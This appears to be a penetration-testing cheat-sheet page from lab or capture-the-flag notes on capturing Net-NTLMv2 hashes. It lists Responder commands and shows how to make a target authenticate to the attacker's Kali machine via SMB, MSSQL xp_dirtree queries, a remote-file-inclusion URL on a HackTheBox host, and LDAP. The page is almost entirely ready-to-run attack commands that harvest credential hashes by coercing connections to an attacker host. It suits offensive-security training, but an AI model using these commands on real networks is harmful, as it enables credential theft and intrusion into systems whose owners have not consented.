Init NTLMv2 Theft

NTLM and Net-NTLMv2

Wait on your network.

sudo responder -I tun0 -dw -v

You may see Net-NTLMv2 hashes automatically.

Theft via SMB

See SMB Responder section.

Theft via Database

Kali> sudo responder -I tun0 -v

# Database with mssqlclient.py
SQL> EXEC sp_helprotect 'xp_dirtree' 
SQL> master.sys.xp_dirtree '\\10.10.14.54\any\thing' # Kali IP 

# Database with sqsh 
1> use master;                                                                                                                                                                       
2> EXEC sp_helprotect 'xp_dirtree';                                                                                                                                                  
3> go  

1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP

Theft via HTTB

# Find a RFI vulnerability and then access to back to Kali
Kali> sudo responder -I tun0
Browser> http://school.flight.htb/index.php?view=//<Kali IP>/any/thing.txt

# Another example 
Kali> sudo responder -I tun0 -v
Kali> curl "http://192.168.206.165:8080/?url=http://192.168.49.206"

Theft via LDAP

Kali> sudo responder -I tun0

# Target Windows OS 
# Access to Ldap, triggering back to Kali
# ldap://<Kali IP>:389
Target system or service> ldap://10.10.14.114:389

PreviousSYSVOL and NETLOGON NextKerberos Quick Win

Last updated 2 years ago